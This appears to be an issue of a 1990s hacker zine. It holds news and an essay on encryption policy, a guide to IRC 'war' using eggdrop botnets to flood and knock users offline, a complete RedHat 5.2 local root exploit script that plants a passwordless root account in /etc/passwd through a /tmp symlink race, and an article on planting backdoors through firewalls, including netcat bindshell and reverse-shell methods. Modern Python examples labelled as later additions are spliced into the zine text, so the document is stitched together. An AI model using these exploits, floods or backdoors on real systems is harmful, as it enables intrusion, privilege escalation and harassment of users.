The bill would prohibit recovery agents from disclosing the keys or from using the keys to decrypt data except under certain circumstances, such as when a lawful heir of a deceased person wants decryption keys to the deceased's locked information. The draft bill also prohibits recovery agents from selling or revealing in any way their customer lists to other parties.

The new protections, however, are not strong enough to avoid the erosion of privacy rights, said David Sobel, general counsel for the Electronic Privacy Information Center, an advocacy group based in Washington, D.C.

"It is not a pro-encryption proposal," he said. "The bottom line is: This is legislation that would increase law enforcement's ability to access encrypted data."

It also would serve to lay the legal groundwork for eventually outlawing encryption that does not have decryption keys available to law enforcement, Sobel said. "They could say, 'We have established legal procedures in place, they have been used in several cases. Now our problem is not everybody is using encryption that provides us with...access,' " he said.

Barbara Simons, president of the California-based Association for Computing Machinery, said the proposed bill bodes poorly for citizens' privacy. "Our lives are moving more and more online," she said. "There's always the risk that some future government or administration might compromise the rights and freedoms we enjoy today and take advantage of this technology."

The proposed bill was not a surprise, she said, because FBI Director Louis Freeh "has been pushing to have access keys for a long time."

Fred Smith, an attorney in Santa Fe, N.M., who works as a special prosecutor in computer cases, said he does not believe the administration's motives are nefarious. "I really believe that there's a serious and good faith concern about what we're going to do if encryption takes off the way it appears to be taking off at the moment," he said.
A spokesman for DOJ described the proposal as "pending" and declined to comment on it.

One Capitol Hill staffer had some concerns. "I think they are really trying to hobble how people use encryption," said Ellen Stroud, spokeswoman for Rep. Bob Goodlatte (R-Va.), sponsor of the Security and Freedom through Encryption Act, which would relax controls on the export of encryption and prohibit the government from requiring a backdoor into people's e-mail and computer files.

Stroud said law enforcement officials examining electronic files as they pursue criminals in cyberspace could accidentally modify or destroy a company's legitimate files. "[The proposal] doesn't provide the needed protection for companies using encryption," she said. "You're putting yourself at greater liability [if you use a third-party firm to keep encryption keys.] It's easier for somebody to search you."

Stroud also said owners of information searched during a criminal investigation will not necessarily know what information law enforcement officials have been examining because the draft bill would allow law enforcement officials in some cases to delay issuing notice of the search warrant.

"If you want information from me, come to me and get it," Stroud said. "Why go to somewhere else? Why go to my neighbor? If you have a problem, hit it straight on."

@HWA

04.0 The lost art of IRC warfare using eggdrop bots
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I found this while looking for a country script for a certain bot on a certain channel and found it pretty informative...so its here for you to peruse and perhaps learn a thing or two from the 'other' side of IRC. - Ed

IRC WAR
~~~~~~~~

Fighting with, and against, the Eggdrop Bot!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

By Stormking

The properly configured Eggdrop bot is one of the most powerful IRC war machines, able to flood, icmp, nuke, and easily takeover channels. It is also damn near impossible to kill!
On this page I will try to teach you a few of the tricks of configuring and using the Eggdrop Warbot. By itself Eggdrop is little more than a tough irc client. The heart of the warbot is in the various tcl scripts designed to wreak havoc on IRC! I'll tell you what they are, where to get them, and how to set them up for maximum damage.

First, let's make sure yer bot's protection is set up properly. Eggdrop flood protection is set in the config file, way down in the "###MORE ADVANCED STUFF###" section. Here's an example from a 1.1.4 bot:

    # how many msgs in how many seconds from the same host constitutes a flood?
    set flood-msg 5:60
    # how many public msgs in how many seconds?
    set flood-chan 10:60
    # how many joins/nick changes in how many seconds?
    set flood-join 5:60
    # how many CTCPs in how many seconds?
    set flood-ctcp 3:60

You can change these to yer liking but I find that the defaults work just fine in most cases. Some bot masters run an extra tcl for protection such as ctcpprot but I've rarely had a bot flud off with the defaults. If you feel you need extra protection, it's there.

Fighting With Eggdrop

So you got a new bot and you want to be a badass? Well, it's easy enough to do. After you have yer bot's protection squared away, you'll need a few tcl scripts to help you on yer way. I don't have the server space to offer all the available war tcls but you can get most any of them at ftp://ftp.sodre.net/pub/eggdrop/ in the appropriate scripts section for yer bot version. Here's a list of some of my favorites:

- icmp tcl           Fabulous, if yer shell supports ping
- Chantoolz          Has its own floods too. For 1.0x
- takeover.tcl       Self explanatory. For 1.0x
- massmode1.1a.tcl   1.1x takeover script
- mjoin.tcl          A mass join script for botnets
- flud501e.tcl       1.0x fludnet scripts. Rox their asses!
- flud501f-oc.tcl    501e modified for 1.1x bots
- Wardrop.tcl        Most everything combined into one script!
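The flood-* settings quoted above are per-host rate thresholds of the form "count:seconds". As an added example (not eggdrop code, and not part of Stormking's article), here is a small sliding-window detector that implements that rule over a constructed event log, so you can see what the bot is actually counting when it decides a host is flooding. The log format, hostnames and timestamps are constructed for the demonstration; the thresholds are the ones from the config excerpt.

```python
"""Sliding-window flood detection in the style of eggdrop's flood-* settings.

Added example, not code from eggdrop or from the article.  A host is flagged
once it produces `count` events of one kind within `seconds`, which is what a
setting such as `set flood-msg 5:60` asks the bot to detect.
"""
from __future__ import annotations

from collections import defaultdict, deque

# Thresholds copied from the config excerpt: "count:seconds" per event kind.
DEFAULT_THRESHOLDS = {
    "msg": "5:60",    # private messages from one host
    "chan": "10:60",  # public channel messages
    "join": "5:60",   # joins / nick changes
    "ctcp": "3:60",   # CTCP requests
}


def parse_threshold(spec: str) -> tuple[int, int]:
    """Turn "5:60" into (5, 60).  A count of 0 disables the check."""
    count, seconds = spec.split(":")
    return int(count), int(seconds)


class FloodDetector:
    """Keep the timestamps of recent events per (host, kind) and flag floods."""

    def __init__(self, thresholds: dict[str, str] = DEFAULT_THRESHOLDS) -> None:
        self.limits = {kind: parse_threshold(spec) for kind, spec in thresholds.items()}
        self.windows: dict[tuple[str, str], deque[float]] = defaultdict(deque)

    def observe(self, ts: float, host: str, kind: str) -> bool:
        """Record one event; return True when it completes a flood for this host."""
        count, seconds = self.limits.get(kind, (0, 0))
        if count == 0:
            return False  # check disabled for this kind
        window = self.windows[(host, kind)]
        window.append(ts)
        # Forget events that have aged out of the window.
        while window and ts - window[0] >= seconds:
            window.popleft()
        if len(window) >= count:
            window.clear()  # the bot would act here; start counting afresh
            return True
        return False


# Constructed sample of bot-side events: "<unix ts> <nick!user@host> <kind>".
SAMPLE_EVENTS = """\
1000 alice!a@host1 msg
1001 alice!a@host1 msg
1002 bob!b@host2 ctcp
1003 alice!a@host1 msg
1004 bob!b@host2 ctcp
1005 alice!a@host1 msg
1006 bob!b@host2 ctcp
1007 alice!a@host1 msg
1070 alice!a@host1 msg
1071 alice!a@host1 msg
"""


def flooders(log: str, thresholds: dict[str, str] = DEFAULT_THRESHOLDS) -> list[tuple[str, str, float]]:
    """Run the detector over a log; return (host, kind, ts) for every flood detected."""
    detector = FloodDetector(thresholds)
    hits: list[tuple[str, str, float]] = []
    for line in log.splitlines():
        ts, source, kind = line.split()
        host = source.split("@", 1)[1]  # eggdrop counts per host, not per nick
        if detector.observe(float(ts), host, kind):
            hits.append((host, kind, float(ts)))
    return hits


if __name__ == "__main__":
    for host, kind, ts in flooders(SAMPLE_EVENTS):
        print(f"{ts:.0f}: {kind} flood from {host}")
```

In the sample, host2 trips the CTCP threshold (3 in 60 s) at t=1006 and host1 trips the msg threshold (5 in 60 s) at t=1007; the two messages at t=1070 and 1071 fall outside the window and are not counted against the earlier burst.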
There are also a few advanced Unix war programs like "botnuke", "ssping", and "pepsi" but they require root access so almost no one can use them. If you have root access, you likely don't need me to tell you how to play war on Unix! The same goes for the fabled "spoofers", if you have them, you know how to use them.

OK, now that we have them, how do we use them? Well, most have their own help files. Use them. Anytime you are planning on loading a script you should always open it in an editor to see if there is anything you need to set before loading it. Now's a good time to look the script over for the basic commands, and the help commands! For example, the help file in takeover.tcl is accessed with the command ".thelp". This is a typical usage. Sometimes there are settings for which user flag will be required to use the tcl. Most default to +m but you can change that. My recommendation is to leave it as +m or even +n. Don't let all yer users access your bot's war stuff unless you want problems with opers.

Let's talk a little about icmp.tcl. This script rox, if you can use it. Unfortunately most shells don't allow ping or allow only very limited pinging. It's easy to find out if you got lucky.... Just load the script, no editing needed for the test. In dcc type ".set icmp 1". Now get someone's dns addy (the numeric one, do "/dns nick" in mIRC) and type ".icmp addy", putting the dns addy instead of the word "addy" of course.... Your bot will do one of several things. Most likely it will say "Sorry, this shell does not support ping". If it does, yer s.o.l., unload the script. It might, however, say "now icmp flooding". If it floods, watch yer victim (or use yer own dns for the test) and see if he poofs. If he drops off within a few minutes you are one of the lucky ones! If not, your ping is limited to a useless level. The help file for icmp.tcl is "icmp".

Another kewl script is mjoin.tcl. It's a botnet mass join/part script.
Its usage is real simple, just load it and type ".mjoin #channel". Every bot on yer net which is running this script will join that channel. Use ".mpart #channel" to get them out. This script can be loads of fun but use it carefully as some people don't care for their bots being jerked into strange channels. Those people, of course, shouldn't run this tcl but some do......

The king of the Eggdrop war scripts is flud.tcl, available in various versions. The ones I prefer are available above. Use 501e for 1.0x bots and 501f for 1.1x. 501e comes complete with 2 versions, a standard -oc version and a +oc version. The +oc (stands for oper-check) will check the victim before fludding and abort fluds on opers, a damn good idea! There is a bit more to this tcl, both in setup and use, than most of the others. To get started open the tcl in any editor EXCEPT PICO (pico doesn't like long lines). You will see these settings at the top:

    # set flag1 "e"       ;# Flag suggested for fludflag.
    set fludword "flud"   ;# Word to use for fluding
    set fludflag "m"      ;# Flag required for fluding.
    set fludver "501-e"   ;# Flud Version. DON'T Change(I'll kill you if you do)!
    set fludmax 10        ;# Max times to flud.
    set fluddef 5         ;# Default flud times.
    set fludnap 45        ;# Leave this at 45 to keep the net in synch!
    set fludnet "EFnet"   ;# Net you are on.
    set fludact 1         ;# Flud on or off? (0/1)
    set ircnick ""        ;# Define your IRC nickname here. EXTREME PROTECTION!
    set fludnick 0        ;# Change to 1 to Enable Nick Changes during fludz.

The first one, #set flag1 "e", you have to uncomment if you want to use it. It gives users a separate flag if they are allowed to flud. I never use this, I just leave the fludflag at "m", allowing any master to flud. The only settings you might need to change here are the fludnet, ircnick, and fludnick. Fludnet, obviously, should be set to the network yer bot is on. Ircnick allows 1.0x bots to have a different nick on the botnet and on irc, a good idea in my opinion.
1.1x allows you to set "botnet nick" in the config file so it's not needed here. Fludnick is an interesting feature, very useful but somewhat annoying. It changes yer bot's nick during fluds to a random nick, such as SJYT233, then changes it back again after the flud. This can save you from k-lines when the victim sends his log to an oper but can be a bitch in a busy channel. I always set fludnick 1. All my bots flud and I have very few k-lines. It's up to you!

OK, once you have these things set it's time to learn how to use flud. The help file for flud.tcl is ".fludhelp". You will need it. There are many types of fluds available, each useful in certain situations. The basic syntax for fluds is ".flud/ nick /# of times/ type of flud". In other words, ".flud butthead 10 15" would flud butthead 10 times with a type 15 flud, a "Boom" echo flud. Always use 10 for the number of lines as most fludbots are set for a maximum of 10. If my victim is a standard mIRC client I like to start with the Boom flud. If there are above 30 fludbots available he will usually drop. If he doesn't drop, he may be running an advanced mIRC script and be basically un-fludable. Against bots I use a "4" or clientinfo flud. Sometimes it works. Another kewl flud is the "22" or privmsg flud. This one opens a bunch of little chat windows on yer victim's screen. Not very effective but annoying as hell! Experiment, find yer own favorites.

A few other useful commands are ".fludbots", which tells you how many bots will flud, and ".last" which tells who made the last flud. Set yer console to +5 to see flud results and progress. Always remember the main rule of fludding, do a /whois on yer victim before fludding. DO NOT EVER flud irc operators. To do so risks not only yer own bots but all fludbots on the net. Most botnets will kick you off for fludding an oper. Remember this. You have been warned.
Fighting Against Eggdrop

Since Eggdrops are UNIX processes they are invincible to standard nuking and such things as will easily kill a Windoze client. A strong icmp, such as from a T3, will kill a bot but that's about it. This assumes, of course, that yer bot is on a solid shell (Win-Eggs are NOT included). I've also had limited success with an old DOS based proggie called Flash. Most Eggdrops don't blink at this but a few will drop. It's worth a try if you need to kill an Eggdrop.

If you have a good fludnet behind you (say 50 or more fludbots) you can sometimes drop an Egg with a standard flud. I find that clientinfo fluds (usually flud type 4) work best against Eggdrops. Again, most won't blink but a few will fall. You can also try a good nuker set for non-standard protocols like "host unreachable". If these things don't work yer likely stuck with waiting and hoping the bot's shell goes down so you can jump in the channel and quickly kill the other users, grabbing ops before the bot returns.

In Conclusion

Many people nowadays say things like "IRC war is lame" or "the days of IRC war are over". Well, lame it may be, but dead it certainly isn't. I am a firm believer in peace on Earth, and on IRC, but I also believe that peace is best maintained, in both cases, through superior firepower.
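The local exploit reproduced in section 05.0 below does nothing more than link /tmp/.font-unix to /etc/passwd and then wait until /etc/passwd has become writable; it counts on a privileged program adjusting the permissions of /tmp/.font-unix by name, which follows the link to whatever it points at. As an added example (not code from the zine, from BlackBox, or from any Red Hat package), here is the defensive pattern for such a program: refuse to follow a symlink, and change the mode through a descriptor opened with O_NOFOLLOW rather than by path. All paths here are stand-ins created under a temporary directory; the function names are hypothetical.

```python
"""Fixing up a world-writable directory in /tmp without following symlinks.

Added example, not part of the zine or of the 05.0 exploit.  `naive_make_world_writable`
is the pattern that exploit relies on (chmod by name); `safe_make_world_writable_dir`
is the hardened replacement.  `demo` runs both against a symlink planted in a
temporary directory, standing in for /tmp/.font-unix -> /etc/passwd.
"""
import os
import stat
import tempfile


def naive_make_world_writable(path: str) -> None:
    """The unsafe pattern: chmod(2) by path name follows symlinks."""
    os.chmod(path, 0o1777)


def safe_make_world_writable_dir(path: str) -> None:
    """Create (or fix up) a sticky, world-writable directory without following links.

    1. mkdir() fails with EEXIST if anything, including a symlink, already sits there.
    2. If something exists, refuse a symlink outright, then open the directory with
       O_NOFOLLOW | O_DIRECTORY and set the mode through the descriptor, so no
       further name lookup can be redirected.
    """
    try:
        os.mkdir(path, 0o1777)  # umask may strip bits; the fchmod below fixes that
    except FileExistsError:
        pass
    st = os.lstat(path)  # lstat: examine the link itself, not its target
    if stat.S_ISLNK(st.st_mode):
        raise PermissionError(f"refusing to follow symlink at {path}")
    if not stat.S_ISDIR(st.st_mode):
        raise NotADirectoryError(path)
    fd = os.open(path, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    try:
        os.fchmod(fd, 0o1777)
    finally:
        os.close(fd)


def demo() -> dict:
    """Plant a symlink to a victim file and compare the two approaches."""
    with tempfile.TemporaryDirectory() as tmp:
        victim = os.path.join(tmp, "passwd")       # stands in for /etc/passwd
        link = os.path.join(tmp, ".font-unix")     # stands in for /tmp/.font-unix
        real = os.path.join(tmp, "real-font-unix")  # a directory that should be fixed up
        with open(victim, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/sh\n")  # constructed sample content
        os.chmod(victim, 0o644)
        os.symlink(victim, link)

        # Unsafe: the victim file, not the link, ends up world-writable.
        naive_make_world_writable(link)
        after_naive = stat.S_IMODE(os.stat(victim).st_mode)

        # Safe: the symlink is refused and the victim is left alone.
        os.chmod(victim, 0o644)
        try:
            safe_make_world_writable_dir(link)
            safe_refused = False
        except PermissionError:
            safe_refused = True
        after_safe = stat.S_IMODE(os.stat(victim).st_mode)

        # Safe function still does its job on a genuine directory.
        safe_make_world_writable_dir(real)
        real_mode = stat.S_IMODE(os.stat(real).st_mode)

        return {
            "after_naive": after_naive,
            "safe_refused": safe_refused,
            "after_safe": after_safe,
            "real_mode": real_mode,
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, oct(value) if isinstance(value, int) else value)
```

The lstat check alone is racy (the link could be planted between the check and the chmod), which is why the mode is applied through the descriptor from an O_NOFOLLOW open: if the path is a symlink at open time the call fails, and once the descriptor refers to the directory inode no later rename or link can redirect it.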
@HWA

05.0 Finally a working redhat 5.2 local exploit - From BlackBox issue #1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

by icesk

    HAPPY_FILE="/etc/passwd"
    MAGIC_FILE="/tmp/.font-unix"
    MAGIC_USER="1C3SK"
    LOGIN=`which login`

    ln -s $HAPPY_FILE $MAGIC_FILE
    echo "made symlink;" `ls -l $MAGIC_FILE`

    while (HAPPY_FILE=HAPPY_FILE); do
        sleep 2;
        if [ -w $HAPPY_FILE ]; then
            echo $MAGIC_USER"::0:0::/:/bin/sh:"
            echo $MAGIC_USER"::0:0::/:/bin/sh:" >> /etc/passwd
            $LOGIN $MAGIC_USER
            exit
        fi;
    done

@HWA

06.0 The state of crypto today
~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.hackernews.com/
contributed by Brian Oblivion

Cyberspace Electronic Security Act, CALEA, OECD, The Wassenaar Arrangement, SAFE, HR-2616, S798, HR-2617, UCITA, and on and on and on. Just what the hell is going on? The government wants crypto controls and the public doesn't.

Buffer Overflow
http://www.hackernews.com/orig/buffero.html

The State of Crypto Policy Today: If you have nothing to hide...

By: Brian Oblivion
L0pht Heavy Industries

The World remains forever changed by the promise of international telecommunications. For the past 3 decades we have enjoyed an ever growing communications explosion providing a mechanism for the free flow of information internationally. With early communications systems, Governments could easily setup listening posts on international links before exiting the country via undersea cable or satellite uplinks. Prior to the mid-1980's the resources to protect communications via cryptography were cost prohibitive and physically constraining.

Privacy is power, therefore it must be regulated.

Today, the proliferation of high-performance, low-power, low-cost micro-processors has opened the door to build cryptographic protection into all communication systems. This would render existing governmental listening outposts obsolete. We know this is true, due to the scrambling at hand on curtailing the proliferation of strong encryption systems and software.
The intelligence communities have noticed a sharp increase in encrypted traffic across the communications networks of the world. This originally prompted the US (United States) to advertise the use of Key Escrow/Recovery encryption, where the keys used to protect information would be stored by a trusted third party. Later, a key could "lawfully" be obtained to decrypt stored files or communications in real-time once protected by that key.

International and domestic opposition to Key escrow/recovery systems has seemed to triumph in Europe and most of the world. The OECD (Organization for Economic Cooperation and Development), a Paris-based international body of 29 countries, resisted lobbying by the US Department of Justice, FBI and NSA to endorse key escrow/recovery systems. The European Union is a staunch opponent to Key Escrow regimes and is presently removing inter-union restrictions on encryption products, leading the way for other countries to adopt privacy focused strategies.

In addition to OECD, The Wassenaar Arrangement, a 32 country body, sets export controls for conventional weapons and sensitive dual-use goods and technologies. The US successfully lobbies this organization, and uses it to assert its crypto policy on an international scale. The bulk of the restrictions on dual-use goods and technologies are uncannily similar to those which are promulgated by the United States. Recently the Arrangement increased export restrictions on encryption products with 64-bit or greater key sizes. In light of this new restriction, many countries have voiced their opposition to this change in policy and plan on not adopting the new restriction.

While no country is bound by any of these agreements, they are encouraged to adopt the guidelines set forth by these bodies. When countries fail to adequately interpret the guidelines to be in line with US interpretation, diplomatic consultation results.
Recently Janet Reno, US Attorney General, wrote the chancellor of Germany's Federal Secretary of Justice to restrict the distribution of "public domain" encryption products. It can be surmised that the position of the US is to petition others to remove all public domain encryption software from distribution servers currently on the Internet.

As a direct result of this international collaboration of encryption policy, the US has recently published its policy on encryption usage, as House Resolution HR-2616. The policy is mostly well founded, and while still not relaxing encryption export controls on encryption bit lengths over 64-bit, it still allows US Citizens to use any encryption they should choose without mandating key escrow mechanisms.

" ...it shall be lawful for any person within any State and for any United States person to use any encryption product, regardless of encryption algorithm selected, encryption bit length chosen, or implementation technique or medium used."

Hopefully the public at large will act responsibly with encryption technology. As with the current view of firearms, this freedom is likely to be short lived.

Nowhere in the document does it discuss the ramifications of keeping keys in tamper-responsive hardware. Nor does it discuss the ramifications of reverse-engineering cryptographic implementations. It can be read that as long as you do not decrypt someone's communications or medium without their consent you are exempt from the laws referenced therein. There is also exclusion for encryption products and services which are used solely for access control, digital signatures, authentication or similar purposes. This does allow the decryption of passwords, and the like for security auditing and other such practices.

However, Government encryption use is called to use escrowed cryptography, as well as are government contractors engaged in contract work for the government.
This is actually more of a blessing than an impediment, where the government at least will have to continue to operate responsibly. The provision still exists where all investigations thwarted by the use of encryption will be recorded by the Attorney General, and maintained in classified form. The results of these findings will undoubtedly sway future addendums to the current policy toward encryption.

The Security and Freedom through Encryption Act (SAFE), once a very liberating legislative initiative, has since come under attack by law enforcement and the intelligence community. The original goal of SAFE was to relax all exportation restrictions regardless of encryption key length. However, the restrictions are now back in the Act, with exceptions for key lengths of 64 bits or less. All other encryption software must first be subject to governmental review before permission can be granted for export.

The export restriction on key length is to be set by a newly formed Encryption Export Advisory board, which shall be comprised of a chairman under the Secretary of Commerce for Export Administration. Seven other individuals appointed by the President representative of the NSA, CIA, the Office of the President, and four from the private sector who have expertise in the information security field. The board is to report to the president every 30 days on what encryption technology is suitable for export. The president can still override any recommendation they may come up with.

The SAFE act continues prohibition on Federal or State governmental mandated key escrow systems. A provision stating that encrypted communications alone is not "probable cause" to obtain a search warrant to request the cleartext of said communications is a big win for privacy advocates. It blocks a blanket probable cause to eavesdrop on all communications, once the majority of traffic is encrypted.

There are some extra penalties for using encryption to hide "criminal" activity.
One can realize that this may become immaterial once it becomes the exception to not encrypt your communications channels or your storage mediums. Especially as the trend for hidden and low level crypto systems is on the rise.

Another disturbing attribute is the mandatory, one-time 15-day technical review of your algorithms/equipment with the Secretary of Commerce. There are some specific restrictions for equipment which can be used for military or intelligence end use, or which may be used for terrorist organizations. It would seem that the definition of what can be construed as such equipment can be quite broad and applied to almost all encryption technologies.

As with the US Crypto Policy house resolution, a committee to research buggered prosecutions due to the employment of encryption technologies, is to be established. The database will be 'classified', and accessible by appropriate law enforcement agencies. The results of this investigation will undoubtedly be used as a case to repeal the prohibition of mandated key escrow systems or a change in export policies. This bill has been introduced into the senate as the PROTECT Act of 1999, S798 IS.

Money is power, therefore we are Taxed.

HR 2617, "To amend the Internal Revenue Code of 1986 to allow a tax credit for development costs of encryption products with plaintext capability without the user's knowledge."

There is a move in Congress (HR 2617) to alter the existing tax law to allow corporations which develop and implement encryption technologies a tax deduction. This tax deduction is not a reward for a high level of security, but rather, if the system has the capability of escrowing keys used in the system. In order for this strategy to work, taxes would continue to rise, thereby aiding those who conform to . The legitimate basis for this Resolution may be to stimulate development to support the US Governments own request for Key escrowed/recovery systems for its use.
Privacy is privilege, therefore communications are supervised.

To further understand the commitment the US Government has on domestic intelligence dominance, the Communications Assistance for Law Enforcement ACT (CALEA), which will provide law enforcement agencies cleartext or clearvoice in near real-time without the end users' knowledge, is clearing hurdle after hurdle. CALEA was once opposed by the telecommunications industry, but now that the Federal Government has removed the monetary burden, from industry to the government, almost all dissension has been quelled.

Performing such a wiretap is permitted only by a court order. But with all new technology, remote capabilities and ease of use will undoubtedly provide some risk of unauthorized monitoring of otherwise private communications. Another possibility is during emergency war powers or some other crisis, the inconvenience of obtaining a court order to perform a wiretap could be waived by a predatorial government, resulting in broad, undetectable eavesdropping capabilities. To thwart such activity, personal encryption technology will still be required to circumvent the buggered, state sponsored systems.

Knowledge is power, therefore it must be controlled.

In the US, The National Conference of Commissioners for Uniform State Laws (NCCUSL) has approved and adopted the Uniform Computer Information Transactions Act (UCITA). While this document has been criticized publicly by Attorney Generals from various states, some of the flaws are detrimental to security applications and condone poor programming practices. Even after cryptographic algorithms are verified to be relatively secure at a certain point in time, the implementation of the overall system utilizing the algorithm can be flawed. One must push software's bounds of normal operations to flesh out any potentially revealing error conditions. Using software outside of its intended use is considered a breach of contract, and prohibited by the UCITA.
There are also stipulations for publicly posting criticizing statements against faulty software. As security groups have proven, many times security holes are only addressed once widebanded to a software company's peers and customers. Cryptographic implementations must be allowed public scrutiny and analysis by one's peers. An implementation steeped in secrecy is usually flawed and obfuscated to prevent the revelation of such flaws. Removing the service of independent analysis will degrade the overall state of security in the industry, leaving the holes in the hands of mandatory federal reviewers.

As we move into the next millennium the topic of encryption will continue to strike up heated debate between Intelligence Communities and liberty advocates. The world is mostly comfortable to give up its privacy for a little security. This is usually done in comfortable political climates. Should that climate ever change, we will have given Government the keys to our lives, and the ability to keep its interests above and beyond the will of its subjects.

The cryptographic debate boils down to: the ability to communicate without the fear of government intrusion, or the possibility for all of your communications to be intercepted by an uninvited third party.

If you have nothing to hide...

OECD Cryptography Policy
http://www.oecd.org/dsti/sti/it/secur/prod/e-crypto.htm

Cryptography and Liberty 1999
http://www2.epic.org/reports/crypto1999.html

UCITA
http://www.law.upenn.edu/bll/ulc/ucita/citam99.htm

EPIC Cryptographic Policy Review
http://www.epic.org/crypto

@HWA

07.0 Using a backdoor in a firewalled system
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[ http://www.rootshell.com/ ]

-------------------------[ Placing Backdoors Through Firewalls

--------[ van Hauser / THC

----[ Introduction

This article describes possible backdoors through different firewall architectures. However, the material can also be applied to other environments to describe how hackers (you?)
cover their access to a system.

Hackers often want to retain access to systems they have penetrated even in the face of obstacles such as new firewalls and patched vulnerabilities. To accomplish this the attackers must install a backdoor which a) does its job and b) is not easily detectable. The kind of backdoor needed depends on the firewall architecture used.

As a gimmick and proof-of-concept, a nice backdoor for any kind of intrusion is included, so have fun.

----[ Firewall Architectures

There are two basic firewall architectures and each has an enhanced version.

Packet Filters:
This is a host or router which checks each packet against an allow/deny ruletable before routing it through the correct interface. There are very simple ones which can only filter from the origin host, destination host and destination port, as well as good ones which can also decide based on incoming interface, source port, day/time and some tcp or ip flags. This could be a simple router, f.e. any Cisco, or a Linux machine with firewalling activated (ipfwadm).

Stateful Filters:
This is the enhanced version of a packet filter. It still does the same checking against a rule table and only routes if permitted, but it also keeps track of the state information such as TCP sequence numbers. Some pay attention to application protocols which allows tricks such as only opening ports to the interior network for ftp-data channels which were specified in a permitted ftp session. These filters can (more or less) get UDP packets (f.e. for DNS and RPC) securely through the firewall. (That's because UDP is a stateless protocol. And it's more difficult for RPC services.) This could be a great OpenBSD machine with the ip-filter software, a Cisco Pix, Watchguard, or the (in)famous Checkpoint FW-1.

Proxies / Circuit Level Gateways:
A proxy as a firewall host is simply any server which has no routing activated and instead has proxy software installed.
Examples of proxy servers which may be used are squid for WWW, a sendmail relay configuration and/or just a sockd.

Application Gateways:
  This is the enhanced version of a proxy. Like a proxy, for every application which should get through the firewall a software must be installed and running to proxy it. However, the application gateway is smart and checks every request and answer, f.e. that an outgoing ftp only may download data but not upload any, and that the data has got no virus, no buffer overflows are generated in answers etc. One can argue that squid is an application gateway, because it does many sanity checks and lets you filter stuff, but it was not programmed for installation in a secure environment and still has/had security bugs. A good example of a freeware kit of this kind is the TIS firewall toolkit (fwtk).

Most firewalls that vendors sell on the market are hybrid firewalls, which means they've got more than just one type implemented; for example the IBM Firewall is a simple packet filter with socks and a few proxies. I won't discuss which firewall product is the best, because this is not a how-to-buy-a-firewall paper, but I will say this: application gateways are by far the most secure firewalls, although money, speed, special protocols, open network policies, stupidity, marketing hype and bad management might rule them out.

----[ Getting in

Before we talk about which backdoors are the best for which firewall architecture we should shed some light on how to get through a firewall the first time. Note that getting through a firewall is not a plug-n-play thing for script-kiddies; this has to be carefully planned and done.

The four main possibilities:

Insider:
  There's someone inside the company (you, girlfriend, chummer) who installs the backdoor. This is the easiest way of course.

Vulnerable Services:
  Nearly all networks offer some kind of services, such as incoming email, WWW, or DNS.
  These may be on the firewall host itself, a host in the DMZ (here: the zone in front of the firewall, often not protected by a firewall) or on an internal machine. If an attacker can find a hole in one of those services, he's got good chances to get in. You'd laugh if you saw how many "firewalls" run sendmail for mail relaying ...

Vulnerable External Server:
  People behind a firewall sometimes work on external machines. If an attacker can hack these, he can cause serious mischief such as the many X attacks if the victim uses it via an X-relay or sshd. The attacker could also send fake ftp answers to overflow a buffer in the ftp client software, replace a gif picture on a web server with one which crashes netscape and executes a command (I never checked if this actually works; it crashes, yeah, but I didn't look through this to see if it is really an exploitable overflow). There are many possibilities with this but it needs some knowledge about the company. However, an external web server of the company is usually a good start. Some firewalls are configured to allow incoming telnet from some machines, so anyone can sniff these and get it. This is particularly true for the US, where academic environments and industry/military work close together.

Hijacking Connections:
  Many companies think that if they allow incoming telnet with some kind of secure authentication like SecureID (secure algo?, he) they are safe. Anyone can hijack these after the authentication and get in ... Another way of using hijacked connections is to modify replies in the protocol implementation to generate a buffer overflow (f.e. with X).

Trojans:
  Many things can be done with a trojan horse. This could be a gzip file which generates a buffer overflow (well, needs an old gzip to be installed), a tar file which tampers f.e. ~/.logout to execute something, or an executable or source code which was modified to get the hacker in somehow.
  To get someone running this, mail spoofing could be used or replacing originals on an external server which internal employees access to update their software regularly (ftp xfer files and www logs can be checked to get to know which files these are).

----[ Placing the Backdoors

An intelligent hacker will not try to put the backdoors on machines in the firewall segment, because these machines are usually monitored and checked regularly. It's the internal machines which are usually unprotected and without much administration and security checks. I will now talk about some ideas of backdoors which could be implemented. Note that programs which will/would run on a stateful filter will of course work with a normal packet filter too, same for the proxy. Ideas for an application gateway backdoor will work for any architecture. Some of them are "active" and others "passive". "Active" backdoors are those which can be used by a hacker anytime he wishes; a "passive" one triggers itself by time/event so an attacker has to wait for this to happen.

Packet Filters:
  It's hard to find a backdoor which gets through this one but does not work for any other. The few ones which come into my mind are
  a) the ack-telnet. It works like a normal telnet/telnetd except it does not work with the normal tcp handshake/protocol but uses TCP ACK packets only. Because they look like they belong to an already established (and allowed) connection, they are permitted. This can be easily coded with the spoofit.h of Coder's Spoofit project (http://reptile.rug.ac.be/~coder).
  b) Loki from Phrack 49/51 could be used too to establish a tunnel with icmp echo/reply packets. But some coding would need to be done.
  c) daemonshell-udp is a backdoor shell via UDP (http://r3wt.base.org look for thc-uht1.tgz)
  d) Last but not least, most "firewall systems" with only a screening router/firewall let any incoming tcp connection from the source port 20 to a highport (>1023) through to allow the (non-passive) ftp protocol to work. "netcat -p 20 target port-of-bindshell" is the fastest solution for this one.

Stateful Filters:
  Here a hacker must use programs which initiate the connection from the secure network to his external 0wned server. There are many out there which could be used:
  active: tunnel from Phrack 52. ssh with the -R option (much better than tunnel ... it's a legitimate program on a computer and it encrypts the datastream).
  passive: netcat compiled with the execute option and run with a time option to connect to the hacker machine (ftp.avian.org). reverse_shell from the thc-uht1.tgz package does the same.

Proxies / Circuit Level Gateways:
  If socks is used on the firewall, someone can use all that stuff for the stateful filter and "socksify" them. (www.socks.nec.com) For more advanced tools you should take a look at the application gateway section.

Application Gateways:
  Now we get down to the interesting stuff. These beasts can be intelligent so some brain is needed.
